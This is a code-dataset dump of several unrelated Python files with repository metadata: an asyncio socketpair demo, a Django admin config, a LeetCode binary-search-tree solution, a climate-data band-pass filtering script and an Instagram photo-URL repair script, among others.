在林荫道上来回
不安地游荡,当着落叶纷飞。
'''
# 对统计中文词频函数进行测试
array = stats_text_cn(text)
print(array)
|
[
"46160162+EthanYan6@users.noreply.github.com"
] |
46160162+EthanYan6@users.noreply.github.com
|
99a090ec7d96de49b32002c3d389094efe608890
|
b6233af6a39e7ab500743d6b2ac7d52f68ae3be2
|
/19/00/2.py
|
9a4163a95b325fbdda531426194e1e107c5ac754
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201712
|
9754526e1d8f1c0519fcce98bc7df803f456cc4e
|
f18f1251074729c4a3865b113edc89ec06b54130
|
refs/heads/master
| 2021-09-02T06:08:08.278115
| 2017-12-30T23:04:55
| 2017-12-30T23:04:55
| 112,670,974
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
import asyncio
try:
from socket import socketpair
except ImportError:
from asyncio.windows_utils import socketpair
# Create a pair of connected file descriptors
rsock, wsock = socketpair()
loop = asyncio.get_event_loop()
def reader():
data = rsock.recv(100)
print("Received:", data.decode())
# We are done: unregister the file descriptor
loop.remove_reader(rsock)
# Stop the event loop
loop.stop()
# Register the file descriptor for read event
loop.add_reader(rsock, reader)
# Simulate the reception of data from the network
loop.call_soon(wsock.send, 'abc'.encode())
# Run the event loop
loop.run_forever()
# We are done, close sockets and the event loop
rsock.close()
wsock.close()
loop.close()
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
ffff5d674aabfb39a7fe604058e907e6a8469b8d
|
af71dc3825a4ad9f8f3582a1532828d680005dea
|
/social/__init__.py
|
895ff9af9158dab005e6dc20c74f0c3c076e27b9
|
[
"BSD-2-Clause",
"Python-2.0",
"BSD-3-Clause"
] |
permissive
|
loitd/python-social-auth
|
48c81b05858e9aabecd7989f6721018da14406d7
|
3a2e40c1d4341a0237363e28928b540ba7e7a49b
|
refs/heads/master
| 2021-07-15T17:07:17.700728
| 2016-04-29T16:40:05
| 2016-04-29T16:42:53
| 58,113,389
| 0
| 0
|
NOASSERTION
| 2021-03-20T05:01:35
| 2016-05-05T07:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 212
|
py
|
"""
python-social-auth application, allows OpenId or OAuth user
registration/authentication just adding a few configurations.
"""
version = (0, 2, 19)
extra = ''
__version__ = '.'.join(map(str, version)) + extra
|
[
"matiasaguirre@gmail.com"
] |
matiasaguirre@gmail.com
|
30aadff3b0ad693ad37410c5ddadb1a597999933
|
9f86a677c78db9b670759595b3b8b1a7f233acfd
|
/listings/admin.py
|
f8e5077d979804e2802b8dda4a1599caec15823d
|
[] |
no_license
|
husainr/btre_project
|
0337f8e705ca59460a62da06f54905fff4b50841
|
e5bfbdc5d9e214d04aa212badeaca09fb2f37090
|
refs/heads/master
| 2020-04-20T07:00:44.152929
| 2019-01-28T14:26:25
| 2019-01-28T14:26:25
| 168,700,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
from django.contrib import admin
from .models import Listing
class ListingAdmin(admin.ModelAdmin):
list_display = ('id','title','is_published','price','list_date','realtor')
list_display_links = ('id','title')
list_filter = ('realtor',)
list_editable = ('is_published',)
search_fields = ('title','description','address','city','price')
list_per_page = 25
admin.site.register(Listing, ListingAdmin)
|
[
"you@example.com"
] |
you@example.com
|
827af1cf985b10a20d8f337fcaae5cbb62d5988b
|
23165420a2ced2306c1154cbd479e67006860e87
|
/Algorithms/二叉搜索树的最近公共祖先.py
|
91ed039655c7be3b5e96ef60887d3ebe524a141a
|
[] |
no_license
|
pppineapple/LeetCode
|
8a446a65f99e2f2c572696caca2550c6e3bd8acc
|
e41a86e9d4615079247ef3ef9a35537f4b40d338
|
refs/heads/master
| 2020-04-06T14:54:02.475837
| 2018-11-19T09:38:56
| 2018-11-19T09:38:56
| 157,558,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,737
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 23 22:29:22 2018
@author: pineapple
"""
'''
给定一个二叉搜索树, 找到该树中两个指定节点的最近公共祖先。
百度百科中最近公共祖先的定义为:“对于有根树 T 的两个结点 p、q,
最近公共祖先表示为一个结点 x,满足 x 是 p、q 的祖先
且 x 的深度尽可能大(一个节点也可以是它自己的祖先)。”
例如,给定如下二叉搜索树: root = [6,2,8,0,4,7,9,null,null,3,5]
_______6______
/ \
___2__ ___8__
/ \ / \
0 _4 7 9
/ \
3 5
示例 1:
输入: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 8
输出: 6
解释: 节点 2 和节点 8 的最近公共祖先是 6。
示例 2:
输入: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 4
输出: 2
解释: 节点 2 和节点 4 的最近公共祖先是 2, 因为根据定义最近公共祖先节点可以为节点本身。
说明:
所有节点的值都是唯一的。
p、q 为不同节点且均存在于给定的二叉搜索树中。
'''
'''
别人的: 时间复杂度O(n) 空间复杂度O(1)
思路:递归
因为题目说这是 二叉搜索树:即 root.left < root < root.right
所以p和q的最近公共祖先一定有 p.val <= root.val <= q.val
上式是假设p.val < q.val,实际函数中会对p.val和q.val取 max 和 min
所以递归思想就是,先对p.val和q.val取 max 和 min
minn = min(p.val, q.val)
maxn = max(p.val, q.val)
如果 minn <= root.val <= maxn 成立,就说明root是最近公共祖先
否则如果 root.val > maxn,就说明p和q都在root的左子树中,
只需要递归调用函数 self.lowestCommonAncestor(root.left, p, q)
否则如果 root.val < minn,就说明p和q都在root的右子树中,
只需要递归调用函数 self.lowestCommonAncestor(root.right, p, q)
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if not root:
return None
minn = min(p.val, q.val)
maxn = max(p.val, q.val)
if minn <= root.val <= maxn:
return root
elif root.val > maxn:
return self.lowestCommonAncestor(root.left, p, q)
elif root.val < minn:
return self.lowestCommonAncestor(root.right, p, q)
|
[
"504434414@qq.com"
] |
504434414@qq.com
|
9969c9d8301f7eb0cef375d5b636e00db8126cfb
|
d2cacbd1bde10e464faabc22ad5936f1aaf4e2ef
|
/data/DescLearning/SummerTests/RGBtrainD/Alexnet/BUTF/OTS/MAC-true/main.py
|
07ef2c62f3b6a26072f5d33198b09fcb7f045794
|
[] |
no_license
|
npiasco/dl_management
|
a26950a3b53c720d881a8b7ac3fa81161a048256
|
11c29a3637efa5fd223b36664d62c704e8166bab
|
refs/heads/master
| 2021-03-16T05:44:39.806437
| 2019-09-06T13:52:52
| 2019-09-06T13:52:52
| 124,055,338
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
#!/usr/bin/env python
import os, sys
import setlog
conf_file = os.environ['DEV'] + 'dl_management/.log/logging.yaml'
save_file = os.path.abspath(sys.argv[0])[:-len(sys.argv[0])] + 'log/'
setlog.reconfigure(conf_file, save_file)
import system.DescriptorLearning as System
if __name__ == '__main__':
machine = System.MultNet(root=os.path.abspath(sys.argv[0])[:-len(sys.argv[0])],
cnn_type='cnn.yaml',
dataset_file='../../../../../datasets/cmu_lt.yaml')
action = input('Exec:\n[t]\ttrain\n[e]\ttest\n[p]\tprint (console)\n[P]\tprint (full)\n[ ]\ttrain+test\n')
if action == 't':
machine.train()
elif action == 'e':
machine.test()
machine.plot(print_loss=False, print_val=False)
elif action == 'p':
machine.plot(print_loss=False, print_val=False)
elif action == 'P':
machine.plot()
elif action == '':
machine.train()
machine.test()
machine.plot(print_loss=False, print_val=False)
elif action == 's':
machine.serialize_net(final=False)
elif action == 'sf':
machine.serialize_net(final=True)
elif action == 'm':
machine.map_print('Main', final=False)
elif action == 'mf':
machine.map_print('Main', final=True)
elif action == 'jet':
machine.map_print()
elif action == 'dataset':
machine.print('train')
elif action == 'testq':
machine.print('test_query')
elif action == 'testd':
machine.print('test_data')
else:
raise ValueError('Unknown cmd: {}'.format(action))
|
[
"nathan.piasco@gmail.com"
] |
nathan.piasco@gmail.com
|
b83333bde4c5f401bfdfa13b41e2fcfc9a51c187
|
42fa1862effc3e494859904b76c43ce2bcd623a0
|
/low_high_band_pass_filtering.py
|
f4ad03423a9a9bded4c998b4dc162316a4c715fa
|
[] |
no_license
|
PaulHalloran/desktop_python_scripts
|
3e83aedf3e232da610b5f7477e4d7e8fb0253f99
|
325e923527278a5c3e9ab8c978f29b2816dab087
|
refs/heads/master
| 2021-01-01T19:52:06.828997
| 2015-06-27T21:14:10
| 2015-06-27T21:14:10
| 38,155,075
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
import iris
import matplotlib.pyplot as plt
import scipy
import iris.quickplot as qplt
import numpy as np
'''
We will use the following functions, so make sure they are available
'''
def butter_bandpass(lowcut, cutoff):
order = 2
low = 1/lowcut
b, a = scipy.signal.butter(order, low , btype=cutoff,analog = False)
return b, a
def low_pass_filter(cube,limit_years):
b1, a1 = butter_bandpass(limit_years, 'low')
output = scipy.signal.filtfilt(b1, a1, cube,axis = 0)
return output
def high_pass_filter(cube,limit_years):
b1, a1 = butter_bandpass(limit_years, 'high')
output = scipy.signal.filtfilt(b1, a1, cube,axis = 0)
return output
'''
Initially just reading in a dataset to work with, and averaging lats and longs to give us a timeseries to plot - you can obviously swap in your timeseries
'''
file = '/media/usb_external1/cmip5/tas_regridded/MPI-ESM-P_tas_piControl_regridded.nc'
cube = iris.load_cube(file)
timeseries1 = cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
'''
Filtering out everything happening on timescales shorter than than X years (where x is called lower_limit_years)
'''
lower_limit_years = 10.0
output_cube = cube.copy()
output_cube.data = low_pass_filter(cube.data,lower_limit_years)
timeseries2 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries2 - np.mean(timeseries2.data),'g',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
Filtering out everything happening on timescales longer than than X years (where x is called upper_limit_years)
'''
upper_limit_years = 5.0
output_cube = cube.copy()
output_cube.data = high_pass_filter(cube.data,upper_limit_years)
timeseries3 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries3 - np.mean(timeseries3.data),'b',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
Filtering out everything happening on timescales longer than than X years (where x is called upper_limit_years) but shorter than y years (where y is called lower_limit_years)
'''
upper_limit_years = 50.0
output_cube = cube.copy()
output_cube.data = high_pass_filter(cube.data,upper_limit_years)
lower_limit_years = 5.0
output_cube.data = low_pass_filter(output_cube.data,lower_limit_years)
timeseries4 = output_cube.collapsed(['latitude','longitude'],iris.analysis.MEAN)
plt.close('all')
qplt.plot(timeseries1 - np.mean(timeseries1.data),'r',alpha = 0.5,linewidth = 2)
qplt.plot(timeseries4 - np.mean(timeseries4.data),'y',alpha = 0.5,linewidth = 2)
plt.show(block = True)
'''
Hopefully this tells you everything you need. Just be aware that strange tings can happen at he ends of the timeseries (just check it is doing something sensible)
'''
|
[
"paul.halloran@gmail.com"
] |
paul.halloran@gmail.com
|
a031ad5ed05e689e5acac722ec476741ddb709b9
|
55d4e10ff2c71ac0f0042bda930d7e3dcc7a1a76
|
/freezing/web/scripts/fix_photo_urls.py
|
6950149827302ee3339431889337c9bc2382c8c6
|
[] |
no_license
|
freezingsaddles/freezing-legacy
|
28f813690b0c81d6a075fe2fc4ebe6d644ab7417
|
d2c0a445e189e0a359fa134258e0d5e14bd9de56
|
refs/heads/master
| 2021-05-09T11:24:56.219056
| 2018-01-23T16:25:57
| 2018-01-23T16:25:57
| 118,989,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,024
|
py
|
from instagram import InstagramAPIError
from freezing.model import meta
from freezing.model.orm import RidePhoto
from freezing.web.autolog import log
from freezing.web.scripts import BaseCommand
from freezing.web.utils.insta import configured_instagram_client
class FixPhotoUrls(BaseCommand):
@property
def name(self):
return 'sync-photos'
def build_parser(self):
parser = super(FixPhotoUrls, self).build_parser()
#
# parser.add_option("--rewrite", action="store_true", dest="rewrite", default=False,
# help="Whether to rewrite the ride photo data already in database.")
return parser
def execute(self, options, args):
# if options.rewrite:
# meta.engine.execute(model.RidePhoto.__table__.delete())
# meta.session_factory().query(model.Ride).update({"photos_fetched": False})
q = meta.session_factory().query(RidePhoto)
q = q.filter_by(img_t=None)
insta_client = configured_instagram_client()
del_q = []
for ride_photo in q:
self.logger.debug("Updating URLs for photo {}".format(ride_photo))
try:
media = insta_client.media(ride_photo.id)
ride_photo.img_l = media.get_standard_resolution_url()
ride_photo.img_t = media.get_thumbnail_url()
meta.session_factory().commit()
except InstagramAPIError as e:
if e.status_code == 400:
self.logger.error("Skipping photo {}; user is set to private".format(ride_photo))
del_q.append(ride_photo.id)
else:
self.logger.exception("Error fetching instagram photo {0} (skipping)".format(ride_photo))
if del_q:
meta.engine.execute(RidePhoto.__table__.delete().where(RidePhoto.id.in_(del_q)))
meta.session_factory().commit()
def main():
FixPhotoUrls().run()
if __name__ == '__main__':
main()
|
[
"hans@xmpl.org"
] |
hans@xmpl.org
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.